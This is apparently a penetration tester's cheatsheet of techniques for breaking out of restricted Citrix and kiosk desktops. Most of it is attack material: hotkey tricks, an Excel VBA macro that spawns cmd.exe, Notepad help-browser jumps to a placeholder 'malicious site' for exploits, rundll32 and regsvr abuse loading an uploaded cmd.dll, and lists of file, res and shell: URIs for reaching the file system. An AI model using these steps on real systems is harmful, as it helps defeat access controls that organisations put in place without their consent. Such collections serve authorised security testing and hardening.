Citrix breakout cheatsheet

Citrix is the cloud computing company that enables mobile workstyles empowering people to work and collaborate from anywhere, accessing apps and data on any of the latest devices, as easily as they would in their own office simply and securely. Citrix

I am going to assume you already know how a Citrix environment looks like. Below is my attempt to collect, correlate and document various techniques to breakout of restricted Citrix environments.

Hotkeys
In Kiosk Mode

Hotkey Combination

Result

Ctrl + h

View History

Ctrl + n

New Browser

Shift + Left Click

New Browser

Ctrl + o

Internet Address bar

Ctrl + p

Print to file

Right Click (Shift + F10)

Save Image As / View Source

F1

Jump to URL

SHIFT+F1

Local Task List

SHIFT+F2

Toggle Title Bar

SHIFT+F3

Close Remote Application

CTRL+F1

Displays Windows Security Desktop – Ctrl+Alt+Del

CTRL+F2

Remote Task List

CTRL+F3

Remote Task Manager – Ctrl+Shift+ESC

ALT+F2

Cycle through programs

ALT+PLUS

Alt+TAB

ALT+MINUS

ALT+SHIFT+TAB

Simple tech breakouts
  • Create shortcuts to C:\
  • Create batch files (given below)
  • Create VBScript files (given below)
  • Microsoft Office
    • File -> Save As
      • Provide direct link of cmd.exe within the address bar.
    • Press F1
      • Search Microsoft
      • Click on Suites Home Page
    • Macros
      • Using excel developer (given below)
Using Excel Developer

Source: Carnal0wnage

  • Add the developers ribbon
    • File –> Options –> Customize Ribbon –> Select Developer in Main Tabs.
  • Click on the Visual Basic button within the Developer tab to enter the breakout code.

  • Enter the following macro code. The following macro code allows to open CMD.exe.

Sub OpenCMD()  
'execute EXE file  
'To open PowerShell, change cmd.exe to powershell.exe.  
Shell "CMD /K C:\windows\system32\cmd.exe", vbNormalFocus  
End Sub  
  • Save the code and then save the document as macro enables workbook.
  • Now, run the macro and boom..

If Internet Explorer is not available, then provide a hyperlink (e.g. www.myveryownmaliciousite.com/exploits) within the excel sheet and then click to open.

Using Notepad

Source: Synjunkie

  1. Open Notepad. Select Help.
  2. Right click on the top left of the Help toolbar.
  3. Select “Jump to Url”
  4. Enter any malicious site. e.g. www.myveryownmaliciousite.com/exploits. The link will open up within a built-in browser.
  5. To browse the file system just replace the URL with the physical path. e.g. C:\windows\system32
  6. This technique can be used to start cmd.exe or powershell.exe depending on your favouritism.
Using Notepad #2
  1. If you are using within a restricted desktop, you can create batch files using Notepad.
  2. Enter cmd.exe within Notepad and save as a .bat file. Or you can enter `powershell.exe or explorer.exe.
  3. Double click on the saved .bat file and have fun.
Yet more Help coming to help

Source: Synjunkie_2

If Software Restriction Policies (SRP) are in use

Note: cmd.dll will be required/uploaded to victim host

Source: Owen Shearing @oshearing (http://rebootuser.com)

c:\windows\regsrv.exe c:\documents and settings\level3\desktop\cmd.dll,ImageView_Fullscreen

Abuse rundll32.exe (a sample)

Source: Owen Shearing @oshearing (http://rebootuser.com)

rundll32.exe shell32.dll,Control_RunDLL timedate.cpl (opens time/date properties) rundll32.exe shell32.dll,Control_RunDLL desk.cpl (opens display properties)

Useful commands/shortcuts (if address bar is accessible)

Source: http://ikat.ha.cked.net/Windows/index.html

about:<input type=file>
about:<a href=C:\>ClickHere</a>
about:</title><a href=C:\>ClickHere</a>
about:<iframe src=C:\>
about:</title><iframe src=C:\>
res://ieframe.dll/24/123
res://explorer.exe/24/123
file://C:/
file://C:\
file://C:\?http
C:\
C:/
%COMSPEC%
%SYSTEMROOT%
%TMP%
%TEMP%
%ProgramFiles%
%UserProfile%
%windir%

Shell Handler Links (requirements as per above)

Source: http://ikat.ha.cked.net/Windows/index.html

shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D} (network places)
shell:::{7007ACC7-3202-11D1-AAD2-00805FC1270E} (network connections)
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D} (my computer)
shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103} (my documents)
shell:::{E17D4FC0-5564-11D1-83F2-00A0C90DC849} (search)
shell:Administrative Tools
shell:AppData
shell:AppUpdatesFolder
shell:CSCFolder
shell:Common Administrative Tools
shell:Common Desktop
shell:Common Documents
shell:Common AppData
shell:Common Start Menu
shell:Desktop
shell:DesktopFolder
shell:DriveFolder
shell:Downloads
shell:Startup
shell:Windows
shell:UsersFilesFolder
shell:UserProfiles

PowerShell location (if installed and not locked down)

Source: Owen Shearing @oshearing (http://rebootuser.com)

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

Other ways of getting a shell

Source: Owen Shearing @oshearing (http://rebootuser.com)

  1. Set the IE homepage to cmd.exe or command.com (if they are not locked down)
  2. An HTML file with the code: <a href=file:///c:\windows\system32\cmd.exe>Command Prompt</a>
  3. A scheduled task to open required program on login

Can you access any of the following:

cscript.exe  
wscript.exe  
command.com  
cmd.exe  
regedit.exe  
format.com  
runas.exe  
Using IKAT

coming soon - require content

Using malicious .ICA files

coming soon - require content

If you have any new tricks that you would like to add here, please let me know and I will happily add it here. Full credits to you.

References

  1. http://synjunkie.blogspot.co.uk
  2. http://carnal0wnage.attackresearch.com
  3. Got Citrix? Hack It! by Shanit Gupta at Blackhat USA 2008
  4. Thanks to Owen Shearing @oshearing (http://rebootuser.com) for his valuable inputs.